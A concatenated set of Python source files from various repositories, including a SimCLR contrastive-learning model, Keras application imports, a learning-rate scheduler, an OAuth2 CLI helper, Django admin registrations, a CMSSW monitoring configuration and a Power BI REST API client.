daec951c7a4cfc6c96464e0ef010081a642e3847
|
[
"MIT"
] | null | null | null |
models/simclr.py
|
ashwinipokle/contrastive_landscape
|
daec951c7a4cfc6c96464e0ef010081a642e3847
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from models.model_utils import SymReLU
from models.nt_xent import NT_Xent
class SimCLROrigModel(nn.Module):
def __init__(self, Wo_init, m, p, d,
has_online_ReLU=True,
has_target_ReLU=True,
device=None,
batch_size=64,
temperature=0.05
) -> None:
super().__init__()
self.p=p
self.m=m
self.d=d
self.Wo = nn.Linear(p, m, bias=True)
self.Wp = nn.Linear(m, m, bias=True)
self.srelu = SymReLU()
self.has_online_ReLU = has_online_ReLU
self.has_target_ReLU = has_target_ReLU
self.init_weights(Wo_init)
self.criterion = NT_Xent(batch_size, temperature)
self.batch_size = batch_size
self.temperature = temperature
self.device = device
self.bn1 = nn.BatchNorm1d(m)
self.name = "simclr-orig"
def init_weights(self, Wo_init):
if self.Wo.weight.shape == Wo_init.T.shape:
Wo_init = Wo_init.T
assert Wo_init.shape == self.Wo.weight.shape
with torch.no_grad():
self.Wo.weight.data = torch.from_numpy(Wo_init).type(torch.float)
def forward(self, x1, x2):
zo, zt = self.Wo(x1), self.Wo(x2)
zo = self.srelu(self.bn1(zo), self.Wo.bias)
zt = self.srelu(self.bn1(zt), self.Wo.bias)
self.predicted_rep = zo
self.target_rep = zt
zo = self.Wp(zo)
zt = self.Wp(zt)
loss = self.criterion(zo, zt)
return loss
class SimCLRModel(nn.Module):
def __init__(self, Wo_init, m, p, d,
has_online_ReLU=True,
has_target_ReLU=True,
device=None,
batch_size=64,
temperature=0.05,
use_bn=False,
) -> None:
super().__init__()
self.p=p
self.m=m
self.d=d
self.Wo = nn.Linear(p, m, bias=True)
self.srelu = SymReLU()
self.has_online_ReLU = has_online_ReLU
self.has_target_ReLU = has_target_ReLU
self.use_bn = use_bn
self.bn1 = nn.BatchNorm1d(m)
self.init_weights(Wo_init)
self.criterion = NT_Xent(batch_size, temperature)
self.batch_size = batch_size
self.temperature = temperature
self.device = device
self.name = "simclr"
def init_weights(self, Wo_init):
if self.Wo.weight.shape == Wo_init.T.shape:
Wo_init = Wo_init.T
assert Wo_init.shape == self.Wo.weight.shape
with torch.no_grad():
self.Wo.weight.data = torch.from_numpy(Wo_init).type(torch.float)
def forward(self, x1, x2):
zo, zt = self.Wo(x1), self.Wo(x2)
if self.use_bn:
zo = self.bn1(zo)
zt = self.bn1(zt)
if self.has_online_ReLU and self.has_target_ReLU:
zo = self.srelu(zo, self.Wo.bias)
zt = self.srelu(zt, self.Wo.bias)
self.predicted_rep = zo
self.target_rep = zt
loss = self.criterion(zo, zt)
return loss
| 26.365079
| 77
| 0.54696
|
77123ef413546198598407553cd2c9fd43c6868f
| 2,515
|
py
|
Python
|
ProgettoLube/WebInspector/venv/Lib/site-packages/tensorflow/python/keras/api/_v2/keras/applications/__init__.py
|
Lube-Project/ProgettoLube
|
cbf33971e2c2e865783ec1a2302625539186a338
|
[
"MIT"
] | null | null | null |
ProgettoLube/WebInspector/venv/Lib/site-packages/tensorflow/python/keras/api/_v2/keras/applications/__init__.py
|
Lube-Project/ProgettoLube
|
cbf33971e2c2e865783ec1a2302625539186a338
|
[
"MIT"
] | null | null | null |
ProgettoLube/WebInspector/venv/Lib/site-packages/tensorflow/python/keras/api/_v2/keras/applications/__init__.py
|
Lube-Project/ProgettoLube
|
cbf33971e2c2e865783ec1a2302625539186a338
|
[
"MIT"
] | 1
|
2021-01-28T01:57:41.000Z
|
2021-01-28T01:57:41.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Keras Applications are canned architectures with pre-trained weights.
"""
from __future__ import print_function as _print_function
import sys as _sys
from . import densenet
from . import efficientnet
from . import imagenet_utils
from . import inception_resnet_v2
from . import inception_v3
from . import mobilenet
from . import mobilenet_v2
from . import nasnet
from . import resnet
from . import resnet50
from . import resnet_v2
from . import vgg16
from . import vgg19
from . import xception
from tensorflow.python.keras.applications.densenet import DenseNet121
from tensorflow.python.keras.applications.densenet import DenseNet169
from tensorflow.python.keras.applications.densenet import DenseNet201
from tensorflow.python.keras.applications.efficientnet import EfficientNetB0
from tensorflow.python.keras.applications.efficientnet import EfficientNetB1
from tensorflow.python.keras.applications.efficientnet import EfficientNetB2
from tensorflow.python.keras.applications.efficientnet import EfficientNetB3
from tensorflow.python.keras.applications.efficientnet import EfficientNetB4
from tensorflow.python.keras.applications.efficientnet import EfficientNetB5
from tensorflow.python.keras.applications.efficientnet import EfficientNetB6
from tensorflow.python.keras.applications.efficientnet import EfficientNetB7
from tensorflow.python.keras.applications.inception_resnet_v2 import InceptionResNetV2
from tensorflow.python.keras.applications.inception_v3 import InceptionV3
from tensorflow.python.keras.applications.mobilenet import MobileNet
from tensorflow.python.keras.applications.mobilenet_v2 import MobileNetV2
from tensorflow.python.keras.applications.nasnet import NASNetLarge
from tensorflow.python.keras.applications.nasnet import NASNetMobile
from tensorflow.python.keras.applications.resnet import ResNet101
from tensorflow.python.keras.applications.resnet import ResNet152
from tensorflow.python.keras.applications.resnet import ResNet50
from tensorflow.python.keras.applications.resnet_v2 import ResNet101V2
from tensorflow.python.keras.applications.resnet_v2 import ResNet152V2
from tensorflow.python.keras.applications.resnet_v2 import ResNet50V2
from tensorflow.python.keras.applications.vgg16 import VGG16
from tensorflow.python.keras.applications.vgg19 import VGG19
from tensorflow.python.keras.applications.xception import Xception
del _print_function
| 48.365385
| 86
| 0.866004
|
0c875de19b1e7f9622e083159d801425d1fb2aa1
| 572
|
py
|
Python
|
neuralnet_pytorch/optim/lr_scheduler/inverse_lr.py
|
justanhduc/neuralnet-pytorch
|
cbb0c5a540a0ba91cb4dd20684bb00692305d193
|
[
"MIT"
] | 28
|
2019-01-07T04:07:55.000Z
|
2021-11-09T15:16:11.000Z
|
neuralnet_pytorch/optim/lr_scheduler/inverse_lr.py
|
justanhduc/neuralnet-pytorch
|
cbb0c5a540a0ba91cb4dd20684bb00692305d193
|
[
"MIT"
] | 9
|
2019-12-25T08:00:33.000Z
|
2021-11-23T09:02:34.000Z
|
neuralnet_pytorch/optim/lr_scheduler/inverse_lr.py
|
justanhduc/neuralnet-pytorch
|
cbb0c5a540a0ba91cb4dd20684bb00692305d193
|
[
"MIT"
] | 3
|
2020-08-07T12:49:05.000Z
|
2022-03-07T21:32:39.000Z
|
import torch.optim as optim
class InverseLR(optim.lr_scheduler.LambdaLR):
"""Decreases lr every iteration by the inverse of gamma times iteration plus 1.
:math:`\\text{lr} = \\text{lr} / (1 + \\gamma * t)`.
Parameters
----------
optimizer
wrapped optimizer.
gamma
decrease coefficient.
last_epoch : int
the index of last epoch. Default: -1.
"""
def __init__(self, optimizer, gamma, last_epoch=-1):
self.gamma = gamma
super().__init__(optimizer, lambda it: 1. / (1. + gamma * it), last_epoch)
| 27.238095
| 83
| 0.611888
|
640aff09c0fd42aa079023c004699bf1f88756c3
| 468
|
py
|
Python
|
scripts/run-web-server.py
|
tmadden/alia-html
|
6a1feb615028ca08de72c9e889c43d6ceb8b9cfd
|
[
"MIT"
] | 1
|
2020-12-31T16:38:04.000Z
|
2020-12-31T16:38:04.000Z
|
scripts/run-web-server.py
|
tmadden/alia-html
|
6a1feb615028ca08de72c9e889c43d6ceb8b9cfd
|
[
"MIT"
] | 15
|
2021-01-24T16:27:10.000Z
|
2021-02-17T19:43:08.000Z
|
scripts/run-web-server.py
|
tmadden/alia-html
|
6a1feb615028ca08de72c9e889c43d6ceb8b9cfd
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import BaseHTTPServer, SimpleHTTPServer
port = 8002
print "Running on port %d" % port
SimpleHTTPServer.SimpleHTTPRequestHandler.extensions_map[
'.wasm'] = 'application/wasm'
httpd = BaseHTTPServer.HTTPServer(('localhost', port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
print "Mapping \".wasm\" to \"%s\"" % \
SimpleHTTPServer.SimpleHTTPRequestHandler.extensions_map['.wasm']
httpd.serve_forever()
| 29.25
| 76
| 0.709402
|
4e0c1aff997716b94e6987b75f26e8944b0904da
| 3,553
|
py
|
Python
|
api_buddy/network/auth/oauth2.py
|
fonsecapeter/ttam-buddy
|
4cff7a6f61825d71ec8ebdfd324631043a0ba8c8
|
[
"MIT"
] | 1
|
2020-06-27T20:00:41.000Z
|
2020-06-27T20:00:41.000Z
|
api_buddy/network/auth/oauth2.py
|
fonsecapeter/api-buddy
|
4cff7a6f61825d71ec8ebdfd324631043a0ba8c8
|
[
"MIT"
] | 35
|
2019-02-11T19:52:38.000Z
|
2021-03-02T21:46:28.000Z
|
api_buddy/network/auth/oauth2.py
|
fonsecapeter/ttam-buddy
|
4cff7a6f61825d71ec8ebdfd324631043a0ba8c8
|
[
"MIT"
] | 1
|
2020-06-27T20:00:47.000Z
|
2020-06-27T20:00:47.000Z
|
import webbrowser
from colorama import Fore, Style
from os import environ
from typing import Optional
from time import sleep
from urllib.parse import urljoin
from requests_oauthlib import OAuth2Session
from api_buddy.utils.exceptions import print_exception
from api_buddy.utils.typing import Options, Preferences, QueryParams
from api_buddy.config.preferences import save_prefs
APPLICATION_JSON = 'application/json'
DRAMATIC_PAUSE = 3 # seconds
HEADERS = {
'Accept': APPLICATION_JSON,
'Content-Type': APPLICATION_JSON,
}
def _get_authorization_response_url() -> str:
return input( # pragma: no cover
f'{Fore.GREEN}Enter the full url{Fore.BLACK}{Style.BRIGHT}:'
f'{Style.RESET_ALL} '
)
def _authenticate(
sesh: OAuth2Session,
client_secret: str,
api_url: str,
redirect_uri: str,
state: Optional[str],
token_path: str,
authorize_path: str,
authorize_params: QueryParams,
) -> str:
"""Perform OAuth2 Flow and get a new token
Note:
Implicitly updates the OAuth2Session
"""
authorization_url, state = sesh.authorization_url(
urljoin(api_url, authorize_path),
state=state,
kwargs=authorize_params,
)
print(
'Opening browser to visit:\n\n'
f'{Fore.BLUE}{Style.BRIGHT}{authorization_url}{Style.RESET_ALL}\n\n'
'Sign in and go through the DSA, then copy the url at the end.\n'
)
sleep(DRAMATIC_PAUSE)
try:
webbrowser.open(authorization_url)
except NotADirectoryError: # If permissions error
print_exception(
title='I couldn\'t open your browser',
message=(
'Go ahead and copy/paste the url into your browser\n'
'Then sign in and go through the DSA.'
),
)
sleep(DRAMATIC_PAUSE)
authorization_response = _get_authorization_response_url()
print()
environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1' # allow non-http redirect_uri
token = sesh.fetch_token(
urljoin(api_url, token_path),
authorization_response=authorization_response,
client_secret=client_secret,
include_client_id=True,
)
return str(token['access_token'])
def get_oauth2_session(
opts: Options,
prefs: Preferences,
prefs_file_name: str,
) -> OAuth2Session:
"""Initialize OAuth2 session"""
sesh = OAuth2Session(
client_id=prefs['oauth2']['client_id'],
redirect_uri=prefs['oauth2']['redirect_uri'],
scope=' '.join(prefs['oauth2']['scopes']),
token={'access_token': prefs['oauth2']['access_token']},
)
sesh.headers.update(HEADERS)
return sesh
def reauthenticate_oauth2(
sesh: OAuth2Session,
prefs: Preferences,
prefs_file: str,
) -> OAuth2Session:
"""Get a new oauth token for an existing session
Also save it to preferences
"""
oauth2_prefs = prefs['oauth2']
access_token = _authenticate(
sesh,
client_secret=prefs['oauth2']['client_secret'],
api_url=prefs['api_url'],
redirect_uri=oauth2_prefs['redirect_uri'],
state=oauth2_prefs['state'],
token_path=oauth2_prefs['token_path'],
authorize_path=oauth2_prefs['authorize_path'],
authorize_params=oauth2_prefs['authorize_params'],
)
prefs['oauth2']['access_token'] = access_token
save_prefs(prefs, prefs_file)
return sesh
| 30.62931
| 79
| 0.646214
|
ec4375f12e02142c68423b6c1ec7f68c03e47dd2
| 550
|
py
|
Python
|
material/admin.py
|
prabinrs/surveilance-system
|
1a9f118737d1043133dbb7247573b4616a680c2d
|
[
"BSD-3-Clause"
] | null | null | null |
material/admin.py
|
prabinrs/surveilance-system
|
1a9f118737d1043133dbb7247573b4616a680c2d
|
[
"BSD-3-Clause"
] | 2
|
2020-06-05T21:39:21.000Z
|
2021-06-10T21:40:18.000Z
|
material/admin.py
|
prabinrs/surveilance-system
|
1a9f118737d1043133dbb7247573b4616a680c2d
|
[
"BSD-3-Clause"
] | 1
|
2020-02-26T15:06:32.000Z
|
2020-02-26T15:06:32.000Z
|
from django.contrib import admin
from .models import (
Material, MaterialRelationship,
MaterialLocationParticipation, MaterialResponsibility
)
@admin.register(Material)
class MaterialAdmin(admin.ModelAdmin):
pass
@admin.register(MaterialRelationship)
class MaterialRelationshipAdmin(admin.ModelAdmin):
pass
@admin.register(MaterialLocationParticipation)
class MaterialLocationParticipationAdmin(admin.ModelAdmin):
pass
@admin.register(MaterialResponsibility)
class MaterialResponsibilityAdmin(admin.ModelAdmin):
pass
| 20.37037
| 59
| 0.816364
|
a737f124742ab7bc9235b2b0ac0af298462cccb7
| 1,482
|
py
|
Python
|
clever_config/actions.py
|
osipov-andrey/python_smart_config
|
2de65d2bef54aadb5cdba1498215a93e71018b28
|
[
"MIT"
] | null | null | null |
clever_config/actions.py
|
osipov-andrey/python_smart_config
|
2de65d2bef54aadb5cdba1498215a93e71018b28
|
[
"MIT"
] | null | null | null |
clever_config/actions.py
|
osipov-andrey/python_smart_config
|
2de65d2bef54aadb5cdba1498215a93e71018b28
|
[
"MIT"
] | null | null | null |
import abc
from os import getenv
from typing import List, Optional, Union
class ActionException(Exception):
pass
class BaseAction(abc.ABC):
def conditionally_transform(self, path_chain: List[Union[str, int]], value: str) -> str:
if self.is_needed(path_chain, value):
return self.transform(path_chain, value)
return value
@staticmethod
def path_to_str(path_chain: List[Union[str, int]]) -> str:
return " -> ".join(str(el) for el in path_chain)
@abc.abstractmethod
def is_needed(self, path_chain: List[Union[str, int]], value: str) -> bool:
pass
@abc.abstractmethod
def transform(self, path_chain: List[Union[str, int]], value: str) -> str:
pass
def __pre_traversal_hook__(self, mapping: dict) -> None:
pass
def __post_traversal_hook__(self, mapping: dict) -> None:
pass
class EnvLoaderAction(BaseAction):
ENV_PLACEHOLDER_PREFIX = "ENV__"
def is_needed(self, path_chain: List[Union[str, int]], value: str) -> bool:
return value.startswith(self.ENV_PLACEHOLDER_PREFIX)
def transform(self, path_chain: List[Union[str, int]], value: str) -> str:
expected_var_name: str = value.replace(self.ENV_PLACEHOLDER_PREFIX, "")
value_: Optional[str] = getenv(expected_var_name)
if not value_:
raise ActionException(f"Broken ENV Variable: {expected_var_name}! Path: {self.path_to_str(path_chain)}")
return value_
| 31.531915
| 116
| 0.674089
|
58dd6b41943e1236cdd4d34fb1ba3769596a4861
| 385
|
py
|
Python
|
data/check_movielens_data.py
|
sourav22899/k-sets-problem
|
9584c59c32a3d7ba4044a7aa41eba321dab5da48
|
[
"MIT"
] | null | null | null |
data/check_movielens_data.py
|
sourav22899/k-sets-problem
|
9584c59c32a3d7ba4044a7aa41eba321dab5da48
|
[
"MIT"
] | null | null | null |
data/check_movielens_data.py
|
sourav22899/k-sets-problem
|
9584c59c32a3d7ba4044a7aa41eba321dab5da48
|
[
"MIT"
] | null | null | null |
import pandas as pd
raw_data = pd.read_csv("./ml-latest-small/ratings.csv")
data = pd.DataFrame({
"request": raw_data["movieId"],
"timestamp": raw_data["timestamp"]
})
data['request'] = pd.factorize(data["request"].tolist(), sort=True)[0]
data = data.sort_values(by=["timestamp"])
data = data.drop_duplicates()
data.info()
data.to_csv('./movielens_cleaned.csv', index=False)
| 27.5
| 70
| 0.698701
|
5589ed1bb1728d5fcc0d5ba8fc70fd5162a7567c
| 5,777
|
py
|
Python
|
DQM/SiStripMonitorHardware/python/test/testSiStripCMMonitor_cfg.py
|
pasmuss/cmssw
|
566f40c323beef46134485a45ea53349f59ae534
|
[
"Apache-2.0"
] | null | null | null |
DQM/SiStripMonitorHardware/python/test/testSiStripCMMonitor_cfg.py
|
pasmuss/cmssw
|
566f40c323beef46134485a45ea53349f59ae534
|
[
"Apache-2.0"
] | null | null | null |
DQM/SiStripMonitorHardware/python/test/testSiStripCMMonitor_cfg.py
|
pasmuss/cmssw
|
566f40c323beef46134485a45ea53349f59ae534
|
[
"Apache-2.0"
] | null | null | null |
import FWCore.ParameterSet.Config as cms
process = cms.Process('DQMCMMonitor')
process.load('Configuration/StandardSequences/Services_cff')
process.load('FWCore/MessageService/MessageLogger_cfi')
process.MessageLogger.cerr.FwkReport.reportEvery = 100
process.source = cms.Source(
"PoolSource",
fileNames = cms.untracked.vstring(
#'file:/home/magnan/SOFTWARE/CMS/data/FED/Commissioning08/Run69750_FEED31F3-58AC-DD11-BF73-000423D99658.root'
#'file:/home/magnan/SOFTWARE/CMS/data/FED/Commissioning08/Run69800_026DBE87-A5AC-DD11-9397-0030487C608C.root'
#'file:/home/magnan/SOFTWARE/CMS/CMSSW_3_1_0_pre11/src/FedWorkDir/FedMonitoring/test/Digi_run69800.root'
#'file:/home/magnan/SOFTWARE/CMS/data/FED/Commissioning08/Run69797_FC26431D-91AC-DD11-A0D1-001617E30CC8.root'
#'file:/home/magnan/SOFTWARE/CMS/data/FED/Commissioning08/Run69874_98BB9120-E6AC-DD11-9B91-000423D99896.root'
'file:/home/magnan/SOFTWARE/CMS/data/FED/Commissioning09/Run106019_00D9F347-4D72-DE11-93F6-001D09F24399.root'
#'file:/home/magnan/SOFTWARE/CMS/data/FED/Commissioning09/Run101045_A6F7D0D3-4560-DE11-A52A-001D09F2545B.root'
),
skipBadFiles = cms.untracked.bool(True),
#inputCommands = cms.untracked.vstring('drop *', 'keep *_source_*_*'),
)
#process.load("DQM.SiStripMonitorHardware.test.source_cff")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1000)
)
#process.service = cms.ProfilerService {
# untracked int32 firstEvent = 1
# untracked int32 lastEvent = 50
# untracked vstring paths = { "p"}
# }
#process.load('DQM.SiStripCommon.MessageLogger_cfi')
process.load('FWCore/MessageService/MessageLogger_cfi')
process.MessageLogger = cms.Service(
"MessageLogger",
info = cms.untracked.PSet(
threshold = cms.untracked.string('INFO'),
#limit = cms.untracked.int32(100000),
noLineBreaks = cms.untracked.bool(False)
),
suppressInfo = cms.untracked.vstring(),
# allows to suppress output from specific modules
suppressDebug = cms.untracked.vstring(),
debug = cms.untracked.PSet(
threshold = cms.untracked.string('DEBUG'),
#limit = cms.untracked.int32(100000),
noLineBreaks = cms.untracked.bool(False)
),
warning = cms.untracked.PSet(
threshold = cms.untracked.string('WARNING'),
#limit = cms.untracked.int32(100000),
noLineBreaks = cms.untracked.bool(False)
),
cerr = cms.untracked.PSet(
threshold = cms.untracked.string('ERROR'),
#limit = cms.untracked.int32(100000),
noLineBreaks = cms.untracked.bool(False)
),
error = cms.untracked.PSet(
threshold = cms.untracked.string('ERROR'),
#limit = cms.untracked.int32(100000),
noLineBreaks = cms.untracked.bool(False)
),
suppressWarning = cms.untracked.vstring(),
#debugModules = cms.untracked.vstring('*'),#'siStripFEDMonitor'),
destinations = cms.untracked.vstring('cerr',
'debug',
'info',
'warning',
'error')
)
process.DQMStore = cms.Service("DQMStore")
#needed to produce tkHistoMap
process.TkDetMap = cms.Service("TkDetMap")
process.SiStripDetInfoFileReader = cms.Service("SiStripDetInfoFileReader")
# Conditions (Global Tag is used here):
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
#process.GlobalTag.connect = "frontier://FrontierProd/CMS_COND_21X_GLOBALTAG"
process.GlobalTag.globaltag = "GR09_31X_V1P::All"
process.es_prefer_GlobalTag = cms.ESPrefer('PoolDBESSource','GlobalTag')
process.load("CondCore.DBCommon.CondDBSetup_cfi")
process.load("Configuration.StandardSequences.MagneticField_38T_cff")
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
# Real data raw to digi
process.load("Configuration.StandardSequences.RawToDigi_Data_cff")
process.load("Configuration.StandardSequences.ReconstructionCosmics_cff")
process.load("DPGAnalysis.SiStripTools.apvshotsanalyzer_cfi")
process.load('DQM.SiStripMonitorHardware.siStripCMMonitor_cfi')
process.siStripCMMonitor.FillWithEventNumber = False
process.siStripCMMonitor.FillWithLocalEventNumber = False
process.siStripCMMonitor.FedIdVec = 100,200,400
process.siStripCMMonitor.PrintDebugMessages = 1
process.siStripCMMonitor.WriteDQMStore = True
process.siStripCMMonitor.DQMStoreFileName = "DQMStore_CM_run106019.root"
#process.siStripCMMonitor.TimeHistogramConfig.NBins = 100
#process.siStripCMMonitor.TimeHistogramConfig.Min = 0
#process.siStripCMMonitor.TimeHistogramConfig.Max = 1
process.load('PerfTools.Callgrind.callgrindSwitch_cff')
process.TFileService = cms.Service("TFileService",
fileName = cms.string("Shot_run106019.root"),
closeFileFast = cms.untracked.bool(True)
)
process.p = cms.Path( #process.profilerStart*
process.siStripDigis
*process.siStripZeroSuppression
*process.apvshotsanalyzer
*process.siStripCMMonitor
#*process.profilerStop
)
process.saveDigis = cms.OutputModule(
"PoolOutputModule",
outputCommands = cms.untracked.vstring(
'drop *_*_*_HLT',
'drop *_*_*Raw_DQMCMMonitor',
'drop *_*_ScopeMode_DQMCMMonitor',
'keep *_siStripDigis_ZeroSuppressed_*',
'keep *_source_*_*'
),
fileName = cms.untracked.string('Digi_run106019.root')
)
process.pout = cms.EndPath( process.saveDigis )
| 40.683099
| 118
| 0.691189
|
9026d04f8a2b56a049194654fef6c4c03c854ba1
| 18,339
|
py
|
Python
|
pbirest/core.py
|
AntoineDW/powerbi-rest-api-python
|
d836c07a048ea82e8e5404323d5e947cc979a223
|
[
"MIT"
] | 3
|
2020-03-02T19:46:51.000Z
|
2022-03-24T03:42:31.000Z
|
pbirest/core.py
|
AntoineDW/powerbi-rest-api-python
|
d836c07a048ea82e8e5404323d5e947cc979a223
|
[
"MIT"
] | 1
|
2022-03-15T21:25:44.000Z
|
2022-03-15T21:25:44.000Z
|
pbirest/core.py
|
AntoineDW/powerbi-rest-api-python
|
d836c07a048ea82e8e5404323d5e947cc979a223
|
[
"MIT"
] | 1
|
2021-07-01T19:48:39.000Z
|
2021-07-01T19:48:39.000Z
|
import requests
import datetime
import logging
import re
token = { "bearer": None, "expiration": None }
credentials = { "client_id": None, "username": None, "password": None, "tenant_id": None, "client_secret": None }
log = logging.getLogger()
console = logging.StreamHandler()
console.setFormatter(logging.Formatter("%(asctime)s\t%(levelname)s -- %(message)s"))
log.addHandler(console)
log.setLevel(20)
HTTP_OK = 200
HTTP_ACCEPTED = 202
def connect(client_id: str, username: str, password: str, tenant_id: str = "common", client_secret: str = None) -> None:
global token
global credentials
if client_secret:
body = {
"grant_type": "password",
"resource": "https://analysis.windows.net/powerbi/api",
"client_id": client_id,
"client_secret": client_secret,
"username": username,
"password": password
}
else:
body = {
"grant_type": "password",
"resource": "https://analysis.windows.net/powerbi/api",
"client_id": client_id,
"username": username,
"password": password
}
headers = { "Content-Type": "application/x-www-form-urlencoded" }
response = requests.post("https://login.microsoftonline.com/{}/oauth2/token".format(tenant_id), headers = headers, data = body)
if response.status_code == HTTP_OK:
set_credentials(client_id, username, password, tenant_id, client_secret)
set_token(response.json()["access_token"])
log.info("Connected to the Power BI REST API with {}".format(username))
else:
set_credentials(None, None, None, None, None)
set_token(None)
log.error("Error {} -- Something went wrong when trying to retrieve the token from the REST API".format(response.status_code))
def verify_token() -> bool:
global token
if token["bearer"] == None:
log.error("Error 401 -- Please connect to the Power BI REST API with the connect() function before")
return False
else:
if token["expiration"] < datetime.datetime.now():
connect(credentials["client_id"], credentials["username"], credentials["password"], credentials["tenant_id"], credentials["client_secret"])
return True
else:
return True
def get_token() -> dict:
global token
return token
def set_token(bearer: str) -> None:
global token
token["bearer"] = "Bearer {}".format(bearer)
token["expiration"] = datetime.datetime.now() + datetime.timedelta(hours = 1)
def set_credentials(client_id: str, username: str, password: str, tenant_id: str, client_secret: str) -> None:
global credentials
credentials["client_id"] = client_id
credentials["username"] = username
credentials["password"] = password
credentials["tenant_id"] = tenant_id
credentials["client_secret"] = client_secret
# Workspace
def get_workspaces() -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups", headers = headers)
if response.status_code == HTTP_OK:
return response.json()["value"]
else:
log.error("Error {} -- Something went wrong when trying to retrieve the list of workspaces you have access".format(response.status_code))
return None
def get_workspace(workspace_id: str) -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups", headers = headers)
if response.status_code == HTTP_OK:
ws = [result for result in response.json()["value"] if result["id"] == workspace_id]
if(len(ws) > 0): return ws[0]
else: return None
else:
log.error("Error {} -- Something went wrong when trying to retrieve the workspace {}".format(response.status_code, workspace_id))
return None
def create_workspace(workspace_name: str, new: bool = False) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
body = { "name": workspace_name }
if new:
response = requests.post("https://api.powerbi.com/v1.0/myorg/groups?workspaceV2=True", headers = headers, data = body)
if response.status_code == HTTP_OK:
result = response.json()
return { "id": result["id"], "isOnDedicatedCapacity": result["isOnDedicatedCapacity"], "name": result["name"] }
else:
log.error("Error {} -- Something went wrong when trying to create a new workspace V2 called {}".format(response.status_code, workspace_name))
return None
else:
response = requests.post("https://api.powerbi.com/v1.0/myorg/groups", headers = headers, data = body)
if response.status_code == HTTP_OK:
result = response.json()
return { "id": result["id"], "isReadOnly": result["isReadOnly"], "isOnDedicatedCapacity": result["isOnDedicatedCapacity"], "name": result["name"] }
else:
log.error("Error {} -- Something went wrong when trying to create a new workspace called {}".format(response.status_code, workspace_name))
return None
def delete_workspace(workspace_id: str) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.delete("https://api.powerbi.com/v1.0/myorg/groups/{}".format(workspace_id), headers = headers)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to delete the workspace {}".format(response.status_code, workspace_id))
return None
def get_users_in_workspace(workspace_id: str) -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups/{}/users".format(workspace_id), headers = headers)
if response.status_code == HTTP_OK:
return response.json()["value"]
else:
log.error("Error {} -- Something went wrong when trying to retrieve the list of users in the workspace {}".format(response.status_code, workspace_id))
return None
def add_user_to_workspace(workspace_id: str, email: str, access: str = "Member") -> dict:
global token
if(not verify_token()): return None
if(access in ["Admin", "Contributor", "Member"]):
headers = { "Authorization": token["bearer"] }
body = { "userEmailAddress": email, "groupUserAccessRight": access }
response = requests.post("https://api.powerbi.com/v1.0/myorg/groups/{}/users".format(workspace_id), headers = headers, data = body)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to add {} in the workspace {}".format(response.status_code, email, workspace_id))
return None
else:
log.error("Error 400 -- Please, make sure the access parameter is either \"Admin\", \"Contributor\" or \"Member\"")
return None
def delete_user_from_workspace(workspace_id: str, email: str) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.delete("https://api.powerbi.com/v1.0/myorg/groups/{}/users/{}".format(workspace_id, email), headers = headers)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to delete the user {} from the workspace {}".format(response.status_code, email, workspace_id))
return None
def update_user_in_workspace(workspace_id: str, email: str, access: str = "Member") -> dict:
global token
if(not verify_token()): return None
if(access in ["Admin", "Contributor", "Member"]):
headers = { "Authorization": token["bearer"] }
body = { "userEmailAddress": email, "groupUserAccessRight": access }
response = requests.put("https://api.powerbi.com/v1.0/myorg/groups/{}/users".format(workspace_id), headers = headers, data = body)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to update {} in the workspace {}".format(response.status_code, email, workspace_id))
return None
else:
log.error("Error 400 -- Please, make sure the access parameter is either \"Admin\", \"Contributor\" or \"Member\"")
return None
# Report
def get_reports(workspace_id: str) -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups/{}/reports".format(workspace_id), headers = headers)
if response.status_code == HTTP_OK:
return response.json()["value"]
else:
log.error("Error {} -- Something went wrong when trying to retrieve the list of reports in the workspace {}".format(response.status_code, workspace_id))
return None
def get_report(workspace_id: str, report_id: str) -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups/{}/reports/{}".format(workspace_id, report_id), headers = headers)
if response.status_code == HTTP_OK:
return response.json()
else:
log.error("Error {} -- Something went wrong when trying to retrieve the report {} in the workspace {}".format(response.status_code, report_id, workspace_id))
return None
def delete_report(workspace_id: str, report_id: str) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.delete("https://api.powerbi.com/v1.0/myorg/groups/{}/reports/{}".format(workspace_id, report_id), headers = headers)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to delete the report {} in the workspace {}".format(response.status_code, report_id, workspace_id))
return None
def export_report(workspace_id: str, report_id: str, out_file: str) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups/{}/reports/{}/export".format(workspace_id, report_id), headers = headers)
if response.status_code == HTTP_OK:
with open(out_file, "wb") as file: file.write(response.content)
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to export the report {} in the workspace {}".format(response.status_code, report_id, workspace_id))
return None
